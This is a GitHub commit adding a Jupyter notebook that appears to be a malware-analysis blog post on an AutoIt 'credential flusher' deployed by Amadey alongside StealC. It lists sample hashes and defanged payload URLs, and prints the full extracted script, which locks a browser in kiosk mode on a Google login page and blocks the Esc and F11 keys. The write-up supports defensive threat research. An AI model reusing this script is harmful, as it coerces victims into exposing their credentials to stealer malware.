generated from fastai/fastpages
-
Notifications
You must be signed in to change notification settings - Fork 15
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
146 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,146 @@ | ||
| { | ||
| "cells": [ | ||
| { | ||
| "cell_type": "markdown", | ||
| "id": "a651419c-76a2-4e20-96a1-8a53f24c1f7e", | ||
| "metadata": {}, | ||
| "source": [ | ||
| "# AutoIt Credential Flusher\n", | ||
| "> Forcing users to enter credentials so they can be stolen\n", | ||
| "- toc: true \n", | ||
| "- badges: true\n", | ||
| "- categories: [credflusher,kiosk,stealer,stealc,amadey,autoit]" | ||
| ] | ||
| }, | ||
| { | ||
| "cell_type": "markdown", | ||
| "id": "c1238c47-55a7-44fa-814c-069b769c4f3d", | ||
| "metadata": {}, | ||
| "source": [ | ||
| "## Overview\n", | ||
| "\n", | ||
| "We have recently observed a new technique used by stealers to force victims into entering credentials into a browser, allowing them to be stolen from the browser's credential store using traditional stealer malware. This technique dates back to at least August 22, 2024, and has been used in conjunction with [StealC malware](https://www.unpac.me/search?terms=bWFsd2FyZToiU3RlYWxjIg%3D%3D). Intelligence from our partners at the [Loader Insight Agency](https://loaderinsight.agency/) has revealed that this technique is mainly deployed by [Amadey](https://loaderinsight.agency/?p=amadey) when dropping StealC.\n", | ||
| "\n", | ||
| "## Samples\n", | ||
| "The following samples provide an example of the technique implemented as an AutoIt script, though a more comprehensive graph of samples is available via [UnpacMe PIVOT](https://pivot.unpac.me/?graph=d05ad317-d6d5-4065-b368-86238d3ea0ae).\n", | ||
| "- `b119eb3e182224d5399b12f7f106ffd27a0f12dd418a64aa23425000adbc44de` [UnpacMe](https://www.unpac.me/results/2d4f2624-17dc-4d0a-8e18-30fd6ecedcf3?hash=b119eb3e182224d5399b12f7f106ffd27a0f12dd418a64aa23425000adbc44de)\n", | ||
| "- `53aeb2fd2ee3a30d29afce4d852e4b33e96b0c473240691d6d63796caa3016f2` [UnpacMe](https://www.unpac.me/results/e20308ba-353e-4b99-ae27-38d9c30c1157?hash=53aeb2fd2ee3a30d29afce4d852e4b33e96b0c473240691d6d63796caa3016f2)\n", | ||
| "- `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` [UnpacMe](https://www.unpac.me/results/135c3dff-3159-4738-83ed-ed04cc09d3a8?hash=78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078)\n", | ||
| "\n", | ||
| "\n", | ||
| "## Attack Analysis \n", | ||
| "The technique involves launching the victim's browser in kiosk mode and navigating to the login page of the targeted service, usually Google. [Kiosk mode](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-configure-kiosk-mode) forces the browser into full-screen mode and prevents the victim from closing or navigating away from the webpage. This tactic annoys the victim into entering their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser's credential store on disk and can be stolen using stealer malware, which is deployed along with the credential flusher.\n", | ||
| "\n", | ||
| "\n", | ||
| "\n", | ||
| "\n", | ||
| "### Deployment \n", | ||
| "The credential flusher is not a credential stealer itself; it is simply used to pressure the victim into entering their credentials, so it must be used in conjunction with a stealer. Using intelligence provided by the [Loader Insight Agency](https://loaderinsight.agency/), an example deployment is mapped below (see [PIVOT](https://pivot.unpac.me/?graph=39888f81-a73c-4794-80cd-3da7fa9baa25) for full details). \n", | ||
| "\n", | ||
| "- First, the victim is infected with [Amadey](https://research.openanalysis.net/cpp/stl/amadey/loader/config/2022/11/13/amadey.html) `0ec952da5d48ceb59202823d7549139eb024b55d93c2eaf98ca6fa99210b4608`\n", | ||
| "- Amadey is then used to load StealC `99e3eaac03d77c6b24ebd5a17326ba051788d58f1f1d4aa6871310419a85d8af` from `http[:]//31.41.244[.]11/steam/random.exe`\n", | ||
| "- Amadey then loads the Credential Flusher `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` from `http[:]//31.41.244[.]11/well/random.exe`\n", | ||
| "- The Credential Flusher then launches the browser in kiosk mode to force the victim into entering their credentials, which can then be stolen by Stealc.\n", | ||
| "\n", | ||
| "\n", | ||
| "\n", | ||
| "\n", | ||
| "### AutoIt Version\n", | ||
| "The Credential Flusher is implemented as a simple AutoIt script that identifies which browsers are available on the victim's host, then launches the preferred browser in kiosk mode and navigates to the service targeted for credential theft. In the example below, Google is the target: `https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password`.\n", | ||
| "\n", | ||
| "The AutoIt script is packaged into an AutoIt2Exe binary, for example, `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` [UnpacMe](https://www.unpac.me/results/135c3dff-3159-4738-83ed-ed04cc09d3a8?hash=78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078). UnpacMe has extracted the following credential flusher script.\n", | ||
| "\n", | ||
| "```\n", | ||
| "LOCAL $PRIMARYBROWSER = \"\" \n", | ||
| "LOCAL $PRIMARYCLASS = \"\" \n", | ||
| "FUNC CLOSEBROWSER( $CLASS ) \n", | ||
| "WHILE WINEXISTS ( $CLASS ) \n", | ||
| "WINCLOSE ( $CLASS , \"\" ) \n", | ||
| "SLEEP ( 0x000001f4 ) \n", | ||
| "WEND \n", | ||
| "ENDFUNC \n", | ||
| "FUNC OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS ) \n", | ||
| "LOCAL $URL = \"https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password\" \n", | ||
| "IF STRINGINSTR ( $PRIMARYBROWSER , \"msedge.exe\" ) THEN \n", | ||
| "RUN ( $PRIMARYBROWSER & \" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=\" & $URL ) \n", | ||
| "ELSE \n", | ||
| "RUN ( $PRIMARYBROWSER & \" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=\" & $URL ) \n", | ||
| "ENDIF \n", | ||
| "SLEEP ( 0x000007d0 ) \n", | ||
| "LOCAL $HWND = WINGETHANDLE ( $PRIMARYCLASS ) \n", | ||
| "WHILE 0x00000001 \n", | ||
| "IF NOT WINEXISTS ( $HWND ) THEN \n", | ||
| "IF STRINGINSTR ( $PRIMARYBROWSER , \"msedge.exe\" ) THEN \n", | ||
| "RUN ( $PRIMARYBROWSER & \" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=\" & $URL ) \n", | ||
| "ELSE \n", | ||
| "RUN ( $PRIMARYBROWSER & \" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=\" & $URL ) \n", | ||
| "ENDIF \n", | ||
| "SLEEP ( 0x000007d0 ) \n", | ||
| "$HWND = WINGETHANDLE ( $PRIMARYCLASS ) \n", | ||
| "ENDIF \n", | ||
| "WINSETONTOP ( $HWND , \"\" , 0x00000001 ) \n", | ||
| "IF NOT WINACTIVE ( $HWND ) THEN \n", | ||
| "WINACTIVATE ( $HWND ) \n", | ||
| "ENDIF \n", | ||
| "SLEEP ( 0x000001f4 ) \n", | ||
| "WEND \n", | ||
| "ENDFUNC \n", | ||
| "CLOSEBROWSER( \"[CLASS:Chrome_WidgetWin_1]\" ) \n", | ||
| "CLOSEBROWSER( \"[CLASS:MozillaWindowClass]\" ) \n", | ||
| "CLOSEBROWSER( \"[CLASS:IEFrame]\" ) \n", | ||
| "IF FILEEXISTS ( \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" ) OR FILEEXISTS ( \"C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe\" ) THEN \n", | ||
| "$PRIMARYBROWSER = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \n", | ||
| "$PRIMARYCLASS = \"[CLASS:Chrome_WidgetWin_1]\" \n", | ||
| "ELSEIF FILEEXISTS ( \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" ) OR FILEEXISTS ( \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" ) THEN \n", | ||
| "$PRIMARYBROWSER = \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" \n", | ||
| "$PRIMARYCLASS = \"[CLASS:Chrome_WidgetWin_1]\" \n", | ||
| "ELSEIF FILEEXISTS ( \"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" ) OR FILEEXISTS ( \"C:\\Program Files (x86)\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" ) THEN \n", | ||
| "$PRIMARYBROWSER = \"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe\" \n", | ||
| "$PRIMARYCLASS = \"[CLASS:Chrome_WidgetWin_1]\" \n", | ||
| "ELSE \n", | ||
| "EXIT \n", | ||
| "ENDIF \n", | ||
| "IF $PRIMARYBROWSER <> \"\" AND $PRIMARYCLASS <> \"\" THEN \n", | ||
| "OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS ) \n", | ||
| "ENDIF \n", | ||
| "HOTKEYSET ( \"{ESC}\" , \"IgnoreKey\" ) \n", | ||
| "HOTKEYSET ( \"{F11}\" , \"IgnoreKey\" ) \n", | ||
| "FUNC IGNOREKEY( ) \n", | ||
| "ENDFUNC \n", | ||
| "WHILE TRUE \n", | ||
| "SLEEP ( 0x00000064 ) \n", | ||
| "WEND \n", | ||
| "```\n" | ||
| ] | ||
| }, | ||
| { | ||
| "cell_type": "code", | ||
| "execution_count": null, | ||
| "id": "745dd5da-dea1-4fe9-9348-a8ffd0012c5b", | ||
| "metadata": {}, | ||
| "outputs": [], | ||
| "source": [] | ||
| } | ||
| ], | ||
| "metadata": { | ||
| "kernelspec": { | ||
| "display_name": "Python 3 (ipykernel)", | ||
| "language": "python", | ||
| "name": "python3" | ||
| }, | ||
| "language_info": { | ||
| "codemirror_mode": { | ||
| "name": "ipython", | ||
| "version": 3 | ||
| }, | ||
| "file_extension": ".py", | ||
| "mimetype": "text/x-python", | ||
| "name": "python", | ||
| "nbconvert_exporter": "python", | ||
| "pygments_lexer": "ipython3", | ||
| "version": "3.11.5" | ||
| } | ||
| }, | ||
| "nbformat": 4, | ||
| "nbformat_minor": 5 | ||
| } |